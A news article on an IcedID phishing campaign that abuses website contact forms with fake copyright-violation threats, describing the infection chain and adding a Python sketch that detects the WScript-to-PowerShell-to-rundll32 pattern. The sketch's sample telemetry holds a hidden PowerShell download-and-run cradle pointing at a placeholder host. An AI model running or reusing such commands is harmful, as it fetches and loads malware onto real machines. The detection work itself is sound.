Microsoft says it has been tracking a new attack method in which malicious actors are using websites’ contact forms to deliver malware to enterprise email addresses under the false pretenses of legal action.
The malware being delivered is IcedID, which is used to steal information, according to a Microsoft 365 Defender Threat Intelligence Team blog post. The malicious emails instruct users to click a Google link and sign in with their Google credentials to review supposed evidence for the bogus allegations; the link instead downloads the malware.
According to Microsoft, IcedID was primarily a banking trojan, but it can be used for reconnaissance and data exfiltration and can lead to additional malware payloads, including ransomware.
IcedID itself is a banking trojan that has evolved to become an entry point for more sophisticated threats, including human-operated ransomware. It connects to a command-and-control server and downloads additional implants and tools that allow attackers to perform hands-on-keyboard attacks, steal credentials, move laterally across affected networks, and deliver additional payloads.
The attackers may be using an automated process that circumvents CAPTCHA protections. Because the emails come from the websites’ email marketing system, they appear more legitimate than typical phishing emails.
The actual messages include strong language urging recipients to click the link to download the alleged evidence. In one example posted on Microsoft’s blog, an attacker purports to be a photographer claiming that the company’s website used one of their photographs without permission. The photographer threatens legal action if the photographs aren’t removed.
However, clicking the link brings the recipient to a Google page that requires their Google credentials.
After the email recipient signs in, the sites.google.com page automatically downloads a malicious ZIP file, which contains a heavily obfuscated .js file. The malicious .js file is executed via WScript to create a shell object for launching PowerShell to download the IcedID payload (a .dat file), which is decrypted by a dropped DLL loader, as well as a Cobalt Strike beacon in the form of a stageless DLL, allowing attackers to remotely control the compromised device.
The .dat file is loaded via the rundll32 executable, which then launches numerous commands to gather information, including machine discovery, antivirus enumeration, IP and system information, and domain information, and drops SQLite for accessing credentials stored in browser databases, according to Microsoft.
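As an added illustration (not code from the Microsoft blog or the original article), the following Python sketch shows how the process chain described above can be spotted in process-creation telemetry: a PowerShell download cradle whose ancestor is wscript.exe, and a rundll32.exe launch referencing a .dat file under that same script. The event format, rule names, paths and host name are constructed assumptions for the demo.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # process image name, lower-case
    cmdline: str

# Download-cradle shapes commonly seen in script-launched PowerShell.
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|iwr\b|https?://", re.I)

def has_ancestor(ev, by_pid, image, max_depth=5):
    """Walk the parent chain and report whether `image` appears within max_depth hops."""
    cur = by_pid.get(ev.ppid)
    for _ in range(max_depth):
        if cur is None:
            return False
        if cur.image == image:
            return True
        cur = by_pid.get(cur.ppid)
    return False

def find_chain_hits(events):
    """Return (rule, pid) tuples for events matching the WScript -> PowerShell -> rundll32 chain."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        under_wscript = has_ancestor(e, by_pid, "wscript.exe")
        if e.image == "powershell.exe" and under_wscript and DOWNLOAD_RE.search(e.cmdline):
            hits.append(("wscript-child-powershell-download", e.pid))
        if e.image == "rundll32.exe" and under_wscript and ".dat" in e.cmdline.lower():
            hits.append(("rundll32-loads-dat-under-wscript", e.pid))
    return hits

# Constructed sample telemetry (not real logs); paths and host are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "wscript.exe", r'wscript.exe "C:\Users\u\Downloads\evidence.js"'),
    ProcEvent(300, 200, "powershell.exe",
              "powershell.exe -w hidden (New-Object Net.WebClient).DownloadFile('http://PLACEHOLDER.invalid/p.dat','C:\\Temp\\p.dat')"),
    ProcEvent(400, 300, "rundll32.exe", r"rundll32.exe C:\Temp\p.dat,init"),
    ProcEvent(500, 100, "powershell.exe", r"powershell.exe -File C:\scripts\backup.ps1"),  # benign admin script
]

if __name__ == "__main__":
    for rule, pid in find_chain_hits(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The benign PowerShell run under explorer.exe (pid 500) is not flagged, which is the point of anchoring both rules on the wscript.exe ancestor rather than on PowerShell or rundll32 alone.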
Microsoft also noted a secondary attack chain that acts as a backup attack flow for when the sites.google.com page in the primary attack chain has been taken down. In this chain, users are redirected to a .top domain and, in the process, inadvertently access a Google User Content page that downloads the malicious .ZIP file.
When run, IcedID connects to a command-and-control server to download modules that run its primary function of capturing and exfiltrating banking credentials and other information. It achieves persistence via scheduled tasks. It also downloads implants like Cobalt Strike and other tools, which allow remote attackers to run malicious activities on the compromised system, including collecting additional credentials, moving laterally, and delivering secondary payloads.
In the examples Microsoft gave, the sender purports to be either a designer or illustrator, claiming a copyright violation. This creates a relatively high rate of success for the attackers and a new form of social engineering.
In the blog, Microsoft also offered queries to find emails and downloads associated with the threat.